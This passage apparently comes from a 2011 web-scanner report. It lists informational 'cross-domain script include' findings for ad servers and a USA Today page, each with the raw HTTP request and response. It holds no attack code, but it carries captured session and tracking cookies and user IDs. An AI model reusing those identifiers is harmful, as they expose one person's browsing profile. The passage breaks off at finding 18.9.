Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUlVjb46xel_B1pRvtUstYmBf.mMUDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQYGLgaG5eaMQMUMgbcYBYEU505GfiDFYMDHwMjMxMLPysjGyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XDwohL62J3sIXA1JsWBLIKCADRapOK

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUA0JKRlc1ZV6E31_Bd0WGv_ToRnQDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2raSc_45RLfcMAlWsD6vsO1OcC03fk3wIrXPo2eXRm4NK38WbcZKhcC9DMn0Az3WBmbjS_aYJTn3m6Pm45CaA7O5cA_dcMNPMX0Ex3mJmT9CP8oXIYfu_l2OYNlcNwSy.HSz8uuY7smFM45ZLcruOUi_C6hlPOb0IITjnXBg6oHEY8dEi438apT8JOG5e.9pM7N.HS135yRi0w_Bhxyld2CwHlGXyP6zUwcDEwLDdnBCpmCLzFKAikOHcy8gMpBgN.BiYmRmZ.FkZWRjZGdkYORk5GLkZuRh5GXkY.sBKWTEYRoMqlBWB9CmYQwRAmEUZRoLD8Lh7cWhe7g60Ep98vILcwMAAAkcyWNQ--; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:36:14 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3920
Date: Mon, 09 May 2011 15:36:13 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1987910106?click=http://ad.amgdgt.com/ads/t=c/s=...[SNIP]..._...[SNIP]...-/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=1158518083" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

18.2. http://ad.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=88105499721132220&clkurl=http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAfxzeJwAAAAA./cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUaGIdSlqXB8gTNDuT_OL7eWkwL7QDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7nWCoCsZmAAAFGskws-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUVGIL2vn32CiWPiwQj5OTzmIjggADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqR9VoXJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJBgYmDqXAP3QDDTzF9BMd5iZk_Qj_KFyGP7r5djmDZXDcEsvh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqBxGPHRIuN_GqU_CThuXvvaTOzfh0td.ckYtTrkTwouBYcuIU76yWwgoz.B7XK8BlIoCbzEKMgLT005GfiDFYMDHwMjMyMLEys_GyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XNyoRd42J3RqCjYIkW5AIGAPYfk5A-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:18 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3928
Date: Mon, 09 May 2011 15:35:17 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1875839577?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUNRNOhbAPD5FIvSW2ZNjj_...[SNIP]..._c2E9bCZhaT1CQUZPcXF3bklUYlRZSm9YMGxBZi1qZkhLQ2RmcS1OTUJsNkdVN0JqWjU5SFNId0FRQVJnQklBQTRBVkNBeC1IRUJHREpob1dKaUtTRUVJSUJGMk5oTFhCMVlpMDJOelF6TmpJeU5USTFNakF5TlRjeW9BSEQ4djNzQTdJQkVYZDNkeTVqYzIxdmJtbDBiM0l1WTI5dHVnRUtNekF3ZURJMU1GOWhjOGdCQ2RvQklXaDBkSEE2THk5M2QzY3VZM050YjI1cGRHOXlMbU52YlM5Q2RYTnBibVZ6YzVnQ3dBekFBZ1RJQW9YU3p3cmdBZ0RxQWhBek1EQjRNalV3UTE5SFpXNWxjbUZzcUFNQjZBTnI2QU9UQmVnRG1BUG9BNHNKNkFPTUNmVURBZ1FBUlBVRElBQUFBT0FFQVlBRzZjU0Y5TVdRMW9reSZudW09MSZzaWc9QUdpV3F0eWdZWVkxV2pOYWV3eG1OVWV0WHZyWWs2a2paZyZjbGllbnQ9Y2EtcHViLTY3NDM2MjI1MjUyMDI1NzImYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=1643675704" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

18.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7397
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:37:40 GMT
Expires: Mon, 09 May 2011 15:37:40 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Mar 29 13:01:47 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7444
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:35:13 GMT
Expires: Mon, 09 May 2011 15:35:13 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Oct 27 10:20:44 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5834
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:36:17 GMT
Expires: Mon, 09 May 2011 15:36:17 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Mar 09 17:03:44 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.6. http://bidder.mathtag.com/iframe/notify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1304949603; mt_mop=4:1304955375

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:46 GMT
Set-Cookie: mt_mop=4:1304955494; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:38:46 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:38:11 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 999
Content-Type: text/html
Connection: keep-alive

<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$"></script>
...[SNIP]...

18.7. http://bidder.mathtag.com/iframe/notify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:16 GMT
Set-Cookie: mt_mop=4:1304955375; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:36:16 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:36:12 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 1125
Content-Type: text/html
Connection: keep-alive

<IFRAME SRC="http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect="></SCRIPT>
...[SNIP]...

18.8. http://content.usatoday.com/topics/reporter/Doyle+Rice

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /topics/reporter/Doyle+Rice

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /topics/reporter/Doyle+Rice HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; s_ppv=24; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fweather%25252Ffloods%25252F2011-05-02-ohio-mississippi-river-floods_n.htm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Ftopics%25252Freporter%25252FDoyle%25252BRice%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:43:07 GMT
Content-Length: 63322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Topics Index Page - USATODAY.com</title>
<meta name="ROBOTS" cont
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>
<script src="http://jqueryui.com/ui/jquery.ui.widget.js"></script>
...[SNIP]...

18.9. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The response dynamically includes the following script from another domain:

Request

